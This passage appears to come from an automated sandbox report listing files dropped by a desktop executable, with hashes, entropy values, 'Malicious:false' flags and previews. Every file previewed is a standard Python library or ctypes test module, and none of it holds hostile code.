                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):133
                                                                                                                                                                                                                                  Entropy (8bit):4.404091567342511
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:16dWRIXJ7LRAuKLRAM174adR8iDFoNFH9LmduQ26GKadR6n:14WI57LRERHNT8iD6HaMQEpT6
                                                                                                                                                                                                                                  MD5:031F54940ABDF481926457972FD90E0F
                                                                                                                                                                                                                                  SHA1:75689CDC1D790A7BC71E507903A00882DB6B652A
                                                                                                                                                                                                                                  SHA-256:758A96E17249E1E97C5CA5D1EE39AA31E5D439D0922AE7AF0064318E70B59FC8
                                                                                                                                                                                                                                  SHA-512:187E365C0237144C2C3827305B8BB678BFE5161A4AC4AC0E115F78C199DE3D18438FA124CF4303A9175F82FBE8E45057A733337B35ED8B20F9575A18B066A8DC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from _contextvars import Context, ContextVar, Token, copy_context......__all__ = ('Context', 'ContextVar', 'Token', 'copy_context')..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8985
                                                                                                                                                                                                                                  Entropy (8bit):4.414349685597416
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Ve6OGrNnrFPC7ar5Rl4VoJTjIiWJYbOqmwKbgm0qu0JQZGWGyV:46OGrNnrFoivbJTR3m0L
                                                                                                                                                                                                                                  MD5:EF129FD70ED7839F65F7F8CF39EA1B74
                                                                                                                                                                                                                                  SHA1:867C3ED0C4E926460AF3370F1F555DF8E6E7334A
                                                                                                                                                                                                                                  SHA-256:82AFA1D570D4D328EFBBA5CDE3FC21025A44E3CFE5E10D9316A73745194A236B
                                                                                                                                                                                                                                  SHA-512:3108600E03CD66C5BBE2CD37D5539DC961CF62F2385CC4BFB3F15B5FBED0485B820DB753A4EDEC7C4891DAE2CB3A6520C705BD2E3830A014A9D88524FB7A93B9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Generic (shallow and deep) copying operations.....Interface summary:.... import copy.... x = copy.copy(y) # make a shallow copy of y.. x = copy.deepcopy(y) # make a deep copy of y....For module specific errors, copy.Error is raised.....The difference between shallow and deep copying is only relevant for..compound objects (objects that contain other objects, like lists or..class instances).....- A shallow copy constructs a new compound object and then (to the.. extent possible) inserts *the same objects* into it that the.. original contains.....- A deep copy constructs a new compound object and then, recursively,.. inserts *copies* into it of the objects found in the original.....Two problems often exist with deep copy operations that don't exist..with shallow copy operations:.... a) recursive objects (compound objects that, directly or indirectly,.. contain a reference to themselves) may cause a recursive loop.... b) because deep copy copies *eve
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7645
                                                                                                                                                                                                                                  Entropy (8bit):4.489970415664536
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:i0YOWh6nk2vypRXb+7wV+0Xi+xCgGoqn4zs3ftHvpRDkT3LHQXTNS/DK:i7D6n/aDAwV+2UzoWI+fxxRyAS/DK
                                                                                                                                                                                                                                  MD5:5B6BA7867D653890AF7572CC0AAAB479
                                                                                                                                                                                                                                  SHA1:6877D39632885002917342DF18E83BEBD42339EA
                                                                                                                                                                                                                                  SHA-256:E5BF33A527D7251F17BFD491AD0F0858E1A3C4C7C10DC5E578FDB6C80C8F9336
                                                                                                                                                                                                                                  SHA-512:841389A1C64F9384F17F78C929D4161B42CE3389F6AC47666CF1B3CCFEF77F2033EBC86087CB2878BEE336623FC1FAD772F3CD751A57E3797CE0807D75E115BD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Helper to provide extensibility for pickle.....This is only useful to add pickle support for extension types defined in..C, not for instances of user-defined classes..."""....__all__ = ["pickle", "constructor",.. "add_extension", "remove_extension", "clear_extension_cache"]....dispatch_table = {}....def pickle(ob_type, pickle_function, constructor_ob=None):.. if not callable(pickle_function):.. raise TypeError("reduction functions must be callable").. dispatch_table[ob_type] = pickle_function.... # The constructor_ob function is a vestige of safe for unpickling... # There is no reason for the caller to pass it anymore... if constructor_ob is not None:.. constructor(constructor_ob)....def constructor(object):.. if not callable(object):.. raise TypeError("constructors must be callable")....# Example: provide pickling support for complex numbers.....try:.. complex..except NameError:.. pass..else:.... def pickle_complex(c):..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3968
                                                                                                                                                                                                                                  Entropy (8bit):4.824103634261663
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:dIq0/Rp6HYaRBfmqj0vAhdjFRIJSXt/yOTHXQ:hrlfmo0cjFR8ot/yOjQ
                                                                                                                                                                                                                                  MD5:32B7E13B0D5DB6085076605DC93A4FFF
                                                                                                                                                                                                                                  SHA1:639C5571A9118FC62C0CF24D6D07A1340126F7CB
                                                                                                                                                                                                                                  SHA-256:3C30CC40B548B1EF7009CE2F378F5516F5E2FB325208C377D892D3ABB4A2EA88
                                                                                                                                                                                                                                  SHA-512:C8579D85830254EF0BBF2B9E7EDFF694807A99B36DBB8BC5C8456FCF6F9465ABEFF9A77AD143AE9C609B73830C60A6CE534A850069332B3956252A8C9979D386
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Wrapper to the POSIX crypt library call and associated functionality."""....import sys as _sys....try:.. import _crypt..except ModuleNotFoundError:.. if _sys.platform == 'win32':.. raise ImportError("The crypt module is not supported on Windows").. else:.. raise ImportError("The required _crypt module was not built as part of CPython")....import errno..import string as _string..from random import SystemRandom as _SystemRandom..from collections import namedtuple as _namedtuple......_saltchars = _string.ascii_letters + _string.digits + './'.._sr = _SystemRandom()......class _Method(_namedtuple('_Method', 'name ident salt_chars total_size')):.... """Class representing a salt method per the Modular Crypt Format or the.. legacy 2-character crypt method.""".... def __repr__(self):.. return '<crypt.METHOD_{}>'.format(self.name)......def mksalt(method=None, *, rounds=None):.. """Generate a salt for the specified method..... If not specified, the
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16474
                                                                                                                                                                                                                                  Entropy (8bit):4.36498470229318
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:vhxqK/P/zv/3I4aU/J4aJQ8cSLsuxCErDFYCiFBwbxZYwUu/6TTNMnzFcIO/sw:v1X3pLbNFrDiBwnC/acbsw
                                                                                                                                                                                                                                  MD5:CC8985ECA9F01BE5592599AEB491413C
                                                                                                                                                                                                                                  SHA1:0A0D6B94B6E0FFD07EF0A4B91F638FA5FADF9E18
                                                                                                                                                                                                                                  SHA-256:D5194CB311061A9AE2D0BF0B6A51C1ECEC011CDC2B5E6EBA91820C91FB00AC97
                                                                                                                                                                                                                                  SHA-512:D887C8CC8FF58D32F05C5797DC0189DB004CDF4D49C488BCFDC1A03A5BDAAA902DCDB998A4130D16C71B69B3BA34793E5E7984FEB75385E4FB77A03AEA6FC207
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.."""..csv.py - read/write/investigate CSV files.."""....import re..from _csv import Error, __version__, writer, reader, register_dialect, \.. unregister_dialect, get_dialect, list_dialects, \.. field_size_limit, \.. QUOTE_MINIMAL, QUOTE_ALL, QUOTE_NONNUMERIC, QUOTE_NONE, \.. __doc__..from _csv import Dialect as _Dialect....from io import StringIO....__all__ = ["QUOTE_MINIMAL", "QUOTE_ALL", "QUOTE_NONNUMERIC", "QUOTE_NONE",.. "Error", "Dialect", "__doc__", "excel", "excel_tab",.. "field_size_limit", "reader", "writer",.. "register_dialect", "get_dialect", "list_dialects", "Sniffer",.. "unregister_dialect", "__version__", "DictReader", "DictWriter",.. "unix_dialect"]....class Dialect:.. """Describe a CSV dialect..... This must be subclassed (see csv.excel). Valid attributes are:.. delimiter, quotechar, escapechar, doublequote, skipinitialspace,.. lineterminator,
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):302
                                                                                                                                                                                                                                  Entropy (8bit):4.852668847464629
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:8z2wHVpWObNLeQ9exK2kbFYQxEMWLh2jvW/oz2tHRAuyn:8z20hFeOT1DMd2jvb2txa
                                                                                                                                                                                                                                  MD5:7AD62828A8A0FCA041912A20B451904E
                                                                                                                                                                                                                                  SHA1:A90A30E3BC7CCC4800DB1A31DC3CDE3B7C4A86FD
                                                                                                                                                                                                                                  SHA-256:99F3754DEC345ED71E2BCB337E3CDC58B1A4C02D290D870DC20CCDD1FF543AE1
                                                                                                                                                                                                                                  SHA-512:0E111B5D5282ECE51BA41980D4DE56A38FF7A826173A9D883925968EE71BD664C74436FF319CF4AEF482972BC3689A75AADDE2359C2EEAA91D32B9DA534FCAAD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:Files in this directory come from Bob Ippolito's py2app.....License: Any components of the py2app suite may be distributed under..the MIT or PSF open source licenses.....This is version 1.0, SVN revision 789, from 2006/01/25...The main repository is http://svn.red-bean.com/bob/macholib/trunk/macholib/
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):163
                                                                                                                                                                                                                                  Entropy (8bit):4.7583014539285395
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:IG7yVQV368exRnfNAoWQJpKNdeATVYaFWKOvouRBeofHOtvZLl:IR6V3exRn5WQbceAJYasKOvou3HOV1l
                                                                                                                                                                                                                                  MD5:B4E0F252AC2C050A15FAE8D8D5153924
                                                                                                                                                                                                                                  SHA1:B66E8FF57523BDC8E3C1947D84E137B54CEF0E69
                                                                                                                                                                                                                                  SHA-256:AD449177F69D3150373892859AFF90A1882982E9ABA313B919711B7F38370DEF
                                                                                                                                                                                                                                  SHA-512:B627C5F8A3E16201F4E223AC30A69BA27D1778B9D28DC6B4CFF900EF8123262FAF4E250796E30BF7CA1CA997AD70F15A59B940E19A4DB675DA3892F2C1FB4BC8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""..Enough Mach-O to make your head spin.....See the relevant header files in /usr/include/mach-o....And also Apple's documentation..."""....__version__ = '1.0'..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5456
                                                                                                                                                                                                                                  Entropy (8bit):4.9203067310922455
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:63JF54Kcs5IwOijuELt+hE5zGQ1RK+G9nMexZs0tugAoEwdGfs0tutPScYu5DB7k:4d4KDOl6Vo4pRi9nlXs0sgx8fs0stPSX
                                                                                                                                                                                                                                  MD5:57341ED3630EE8675E3F70C89F977280
                                                                                                                                                                                                                                  SHA1:A63BDDE3913B5076F96C5C6216955BEB07BFB18F
                                                                                                                                                                                                                                  SHA-256:5DAD086AF985C3578C5F1A0C2E8D85BBFC3073624697CDB8E34C46CA9496B161
                                                                                                                                                                                                                                  SHA-512:D1E1A783FA2EA305622A28AB822377B5E4ADFF1894547DC5CBA1D946F6E43E506179C4A49C0C4CCB335220C73F9223F3E33556885D5CABD5FA20D338E3C761BE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""..dyld emulation.."""....import os..from ctypes.macholib.framework import framework_info..from ctypes.macholib.dylib import dylib_info..from itertools import *..try:.. from _ctypes import _dyld_shared_cache_contains_path..except ImportError:.. def _dyld_shared_cache_contains_path(*args):.. raise NotImplementedError....__all__ = [.. 'dyld_find', 'framework_find',.. 'framework_info', 'dylib_info',..]....# These are the defaults as per man dyld(1)..#..DEFAULT_FRAMEWORK_FALLBACK = [.. os.path.expanduser("~/Library/Frameworks"),.. "/Library/Frameworks",.. "/Network/Library/Frameworks",.. "/System/Library/Frameworks",..]....DEFAULT_LIBRARY_FALLBACK = [.. os.path.expanduser("~/lib"),.. "/usr/local/lib",.. "/lib",.. "/usr/lib",..]....def dyld_env(env, var):.. if env is None:.. env = os.environ.. rval = env.get(var).. if rval is None:.. return [].. return rval.split(':')....def dyld_image_suffix(env=None):.. if env is No
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1891
                                                                                                                                                                                                                                  Entropy (8bit):4.849862491793074
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:vS4hodWSQY3a/U12KWYVCdpZIE8HO28Ubbqha8:vNod7QY3a8WYVCdpZ/Hhf
                                                                                                                                                                                                                                  MD5:CEF944CCD77C054FB37749652A30E9F0
                                                                                                                                                                                                                                  SHA1:44FCAC974EDCE984915A60305CE0EF2D34D5B1AE
                                                                                                                                                                                                                                  SHA-256:144D1FCC7C611A8B50CD48AFBC288DF896E47FD1A1A6A10473811A4DDFF03ED0
                                                                                                                                                                                                                                  SHA-512:A3BA1F4BA4EF470138C086BAFDBB382E0ADB31CF3C411C5A552A78ECCD34407110A5676F456990E15AD665140A3BAF7034D750452904A263188611BBA2349CA9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""..Generic dylib path manipulation.."""....import re....__all__ = ['dylib_info']....DYLIB_RE = re.compile(r"""(?x)..(?P<location>^.*)(?:^|/)..(?P<name>.. (?P<shortname>\w+?).. (?:\.(?P<version>[^._]+))?.. (?:_(?P<suffix>[^._]+))?.. \.dylib$..)..""")....def dylib_info(filename):.. """.. A dylib name can take one of the following four forms:.. Location/Name.SomeVersion_Suffix.dylib.. Location/Name.SomeVersion.dylib.. Location/Name_Suffix.dylib.. Location/Name.dylib.... returns None if not found or a mapping equivalent to:.. dict(.. location='Location',.. name='Name.SomeVersion_Suffix.dylib',.. shortname='Name',.. version='SomeVersion',.. suffix='Suffix',.. ).... Note that SomeVersion and Suffix are optional and may be None.. if not present... """.. is_dylib = DYLIB_RE.match(filename).. if not is_dylib:.. return None.. return is_dylib.groupdict()
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:POSIX shell script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                                                                  Entropy (8bit):4.592685213899164
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:TKH4o8xYdp14T7LtH77RXQ6Iaygn:ho82b2tHRAuygn
                                                                                                                                                                                                                                  MD5:03FC2CB5CFDE6E1C4A2699CD2193133D
                                                                                                                                                                                                                                  SHA1:F7FA6A9D1369B55F332E7E21AFE647C2DA05F81B
                                                                                                                                                                                                                                  SHA-256:7B9EB3A8AF1D12DA22604845995982CA99992876A825F3765E053DDB592620AB
                                                                                                                                                                                                                                  SHA-512:3CB6955D49468F961896DEDFA7AD51FA608D3E9BA5B88946410DD106827040C34F65DEB0DEBBAA6255E11F1380E11FE08310C4688F9845AFA0141178F848248C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#!/bin/sh..svn export --force http://svn.red-bean.com/bob/macholib/trunk/macholib/ ...
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):75
                                                                                                                                                                                                                                  Entropy (8bit):4.514880857909424
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Sydp14T7LtH77RXQ6Iaygn:tb2tHRAuygn
                                                                                                                                                                                                                                  MD5:B88DFC5590F1D09D550605F3AFCAC0D7
                                                                                                                                                                                                                                  SHA1:6724D16CF05434F9B77179D3A340A800EB1AF0DD
                                                                                                                                                                                                                                  SHA-256:7497FBDBB98AFCA4AC455E3A057C59BCDEBAF1280E25C94741DC301F05CB53E5
                                                                                                                                                                                                                                  SHA-512:B154B6C65DD7407D412BBC1BB91D73EE6CBEB94AFE21BF46531B82110095F4F58A80B9A6975FF5FE6902116A313FF22FA50BE33429A643D7C35287C0E0BB2BB1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:svn export --force http://svn.red-bean.com/bob/macholib/trunk/macholib/ ...
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2266
                                                                                                                                                                                                                                  Entropy (8bit):4.8758008419339305
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:RQXAITOwx5A4C0gWHa/Uyb4WHPCdpzGxPiEO+M7uqabYAVle066aa:RSAITJx5A4CPWHaaWHPCdpzGxPiwHqaf
                                                                                                                                                                                                                                  MD5:0FBD9BB28049B7EF685F3E27DEBA9B7F
                                                                                                                                                                                                                                  SHA1:46A6DA7FF03A4574EB15BAFC154FCB4FAB8CC5E0
                                                                                                                                                                                                                                  SHA-256:AF9721872CB633DD93195C40D4404FDFDF1F1B293DFD0956015A22378033A5A8
                                                                                                                                                                                                                                  SHA-512:4A8ACCAE43D9A621A30BE78D4C2D3A2697C2EB7528F72B8DDC74D24D5FBED747C49AD129FA33C4EA218C8849DDEFEDE2CF967C9855C4047E1E27E457A7DC68B5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""..Generic framework path manipulation.."""....import re....__all__ = ['framework_info']....STRICT_FRAMEWORK_RE = re.compile(r"""(?x)..(?P<location>^.*)(?:^|/)..(?P<name>.. (?P<shortname>\w+).framework/.. (?:Versions/(?P<version>[^/]+)/)?.. (?P=shortname).. (?:_(?P<suffix>[^_]+))?..)$..""")....def framework_info(filename):.. """.. A framework name can take one of the following four forms:.. Location/Name.framework/Versions/SomeVersion/Name_Suffix.. Location/Name.framework/Versions/SomeVersion/Name.. Location/Name.framework/Name_Suffix.. Location/Name.framework/Name.... returns None if not found, or a mapping equivalent to:.. dict(.. location='Location',.. name='Name.framework/Versions/SomeVersion/Name_Suffix',.. shortname='Name',.. version='SomeVersion',.. suffix='Suffix',.. ).... Note that SomeVersion and Suffix are optional and may be None.. if not present..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2613
                                                                                                                                                                                                                                  Entropy (8bit):4.133177272037021
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:evl6VWz6dtcyOnAWK90rqx89lG6bgZOmYtj66s5taWj6dUCcy8qupe:evw9dtcy7NOpUuhs5tapd1cy8quA
                                                                                                                                                                                                                                  MD5:0386EA58C0BDBE99EFDC92A7D4B0496A
                                                                                                                                                                                                                                  SHA1:1BC6866200E63EE83B9E483ED822D37914E439CD
                                                                                                                                                                                                                                  SHA-256:3EA0C4294653BAAE3AF691C979123E7DA16E5F946D34B5EE9808E7BF7406B06C
                                                                                                                                                                                                                                  SHA-512:889504A51B2584F68F9393EB8072BE0FACB5C800356CA70106C4E76D5A6F0291226BA408BD74ED6AB14C76DFADB3CF85E37D651710AB6B376F1A47145D301BA2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..import test.support..from ctypes import *....class AnonTest(unittest.TestCase):.... def test_anon(self):.. class ANON(Union):.. _fields_ = [("a", c_int),.. ("b", c_int)].... class Y(Structure):.. _fields_ = [("x", c_int),.. ("_", ANON),.. ("y", c_int)].. _anonymous_ = ["_"].... self.assertEqual(Y.a.offset, sizeof(c_int)).. self.assertEqual(Y.b.offset, sizeof(c_int)).... self.assertEqual(ANON.a.offset, 0).. self.assertEqual(ANON.b.offset, 0).... def test_anon_nonseq(self):.. # TypeError: _anonymous_ must be a sequence.. self.assertRaises(TypeError,.. lambda: type(Structure)("Name",.. (Structure,),.. {"_fields_": [], "_anonymous_": 42})).... def test_anon_nonmember(self):..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1802
                                                                                                                                                                                                                                  Entropy (8bit):4.655095624975382
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:Fxtjx93CMQW9LP7uQwhuzAgbTM9QQHlgsChTM7ANAgbTM9aikQKaXgsChTM7Cpe:FxtjxtCMQEDuQpMjqfMmMJ4awfMmA
                                                                                                                                                                                                                                  MD5:7972CD74387DCFB9143CF40360601C54
                                                                                                                                                                                                                                  SHA1:B622488E6C4909D3E701C3D8440A93440D4322A7
                                                                                                                                                                                                                                  SHA-256:E819FE83514B6A585D6B999901AE949A6C9D4EBA876D92AEB8F1AA2E71D94067
                                                                                                                                                                                                                                  SHA-512:70F81816BF8B3DF2C47D40ADCC3CEEDFA9C1E5B96559CEADC0816D697E8B9FBA0D8F25EB9BC5DD7E2D67E284E32DF331CE415F4EE34248264664E92062BCF06D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..from ctypes import *..from binascii import hexlify..import re....def dump(obj):.. # helper function to dump memory contents in hex, with a hyphen.. # between the bytes... h = hexlify(memoryview(obj)).decode().. return re.sub(r"(..)", r"\1-", h)[:-1]......class Value(Structure):.. _fields_ = [("val", c_byte)]....class Container(Structure):.. _fields_ = [("pvalues", POINTER(Value))]....class Test(unittest.TestCase):.. def test(self):.. # create an array of 4 values.. val_array = (Value * 4)().... # create a container, which holds a pointer to the pvalues array... c = Container().. c.pvalues = val_array.... # memory contains 4 NUL bytes now, that's correct.. self.assertEqual("00-00-00-00", dump(val_array)).... # set the values of the array through the pointer:.. for i in range(4):.. c.pvalues[i].val = i + 1.... values = [c.pvalues[i].val for i in range(4)].... # Th
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7743
                                                                                                                                                                                                                                  Entropy (8bit):4.563084758602701
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:FrUFGNUsDcgsyMtA1mzC3LEdhqOx4h9BUIbBRVWq/y:lU8UsIgsyMtTOEdh9w9JBDy
                                                                                                                                                                                                                                  MD5:BDB5B5B9FB0E9E0D2E1B305094DA1FA2
                                                                                                                                                                                                                                  SHA1:E69920FCB70B1519A21580E75231482D208BE2EF
                                                                                                                                                                                                                                  SHA-256:5673E5CF445FF496D4D02F93C3D5C129D2E8CEB62642C26A186C79CB6BFEB221
                                                                                                                                                                                                                                  SHA-512:6D2B9C47184B74F7BDC2067F6D59BC62364FC6346568C09457FF656D7022AF4C84EFF48489805A05677B7E9B6A50327D259A8807E993851881697B753770AD90
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..from test.support import bigmemtest, _2G..import sys..from ctypes import *....from ctypes.test import need_symbol....formats = "bBhHiIlLqQfd"....formats = c_byte, c_ubyte, c_short, c_ushort, c_int, c_uint, \.. c_long, c_ulonglong, c_float, c_double, c_longdouble....class ArrayTestCase(unittest.TestCase):.. def test_simple(self):.. # create classes holding simple numeric types, and check.. # various properties..... init = list(range(15, 25)).... for fmt in formats:.. alen = len(init).. int_array = ARRAY(fmt, alen).... ia = int_array(*init).. # length of instance ok?.. self.assertEqual(len(ia), alen).... # slot values ok?.. values = [ia[i] for i in range(alen)].. self.assertEqual(values, init).... # out-of-bounds accesses should be caught.. with self.assertRaises(IndexError): ia[alen].. with self.assertRaises(Ind
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7149
                                                                                                                                                                                                                                  Entropy (8bit):4.801824751400148
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:FxAm1tipn5TEez1KzCNpP7aw7eKEdELEdcWEy3dwU+7xqwJAbaMT/YiYvku/PqWv:Ftip51Lp/eTceWhMPYBvk0P59qObuZy
                                                                                                                                                                                                                                  MD5:E8AE379E7175932C155F30F2780DD733
                                                                                                                                                                                                                                  SHA1:C6634A41FBC500864B7900040DFED535BFB090EB
                                                                                                                                                                                                                                  SHA-256:8225672DF52A662CB66C1B59A8328068C378017031A480689BDDCBD4D964244D
                                                                                                                                                                                                                                  SHA-512:49AC143F44219741379D608424042A94C9D9094CEA78F64D623B5DFCE3A27EB6B6118694F8200C41CE245491019DDAA44109CDF90AE0B38AD01B4B55809A282C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..from ctypes import *..from ctypes.test import need_symbol..import _ctypes_test....dll = CDLL(_ctypes_test.__file__)....try:.. CALLBACK_FUNCTYPE = WINFUNCTYPE..except NameError:.. # fake to enable this test on Linux.. CALLBACK_FUNCTYPE = CFUNCTYPE....class POINT(Structure):.. _fields_ = [("x", c_int), ("y", c_int)]....class BasicWrapTestCase(unittest.TestCase):.. def wrap(self, param):.. return param.... @need_symbol('c_wchar').. def test_wchar_parm(self):.. f = dll._testfunc_i_bhilfd.. f.argtypes = [c_byte, c_wchar, c_int, c_long, c_float, c_double].. result = f(self.wrap(1), self.wrap("x"), self.wrap(3), self.wrap(4), self.wrap(5.0), self.wrap(6.0)).. self.assertEqual(result, 139).. self.assertIs(type(result), int).... def test_pointers(self):.. f = dll._testfunc_p_p.. f.restype = POINTER(c_int).. f.argtypes = [POINTER(c_int)].... # This only works if the value c_int(42) pass
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10652
                                                                                                                                                                                                                                  Entropy (8bit):4.486258559034558
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:zChoqnjC8LDnaBwEUOw4v9WzVSZWuSIJSMDKEd5kEdMwbEdqLdEdCidEdfudj4pr:Nq9ECvMtthkhwzU98vsA
                                                                                                                                                                                                                                  MD5:3D570B4C809341BCC9E10C45AEA8101A
                                                                                                                                                                                                                                  SHA1:23A102B4122FF39D6E99D3C451F2A92557CD1B48
                                                                                                                                                                                                                                  SHA-256:5FDB2670522B40F7EA52D1E1FEC71AC699DB65DE7044C374E2AB1D5E62DF51CC
                                                                                                                                                                                                                                  SHA-512:C0134C6D0CCE669CDF0E14B458F5B3D7384A2CA1E4FE695A2771416AE58B025D992E39B151A3F40C8ED238EB27E5457CEAE7920CFCE04312ACDE05E44318BE69
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from ctypes import *..from ctypes.test import need_symbol..from test import support..import unittest..import os....import _ctypes_test....class BITS(Structure):.. _fields_ = [("A", c_int, 1),.. ("B", c_int, 2),.. ("C", c_int, 3),.. ("D", c_int, 4),.. ("E", c_int, 5),.. ("F", c_int, 6),.. ("G", c_int, 7),.. ("H", c_int, 8),.. ("I", c_int, 9),.... ("M", c_short, 1),.. ("N", c_short, 2),.. ("O", c_short, 3),.. ("P", c_short, 4),.. ("Q", c_short, 5),.. ("R", c_short, 6),.. ("S", c_short, 7)]....func = CDLL(_ctypes_test.__file__).unpack_bitfields..func.argtypes = POINTER(BITS), c_char....##for n in "ABCDEFGHIMNOPQRS":..## print n, hex(getattr(BITS, n).size), getattr(BITS, n).offset....class C_Test(unittest.TestCase):.... def test_ints(self):.. for i in r
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                                                                                  Entropy (8bit):4.726464719300847
                                                                                                                                                                                                                                  Encrypted:false
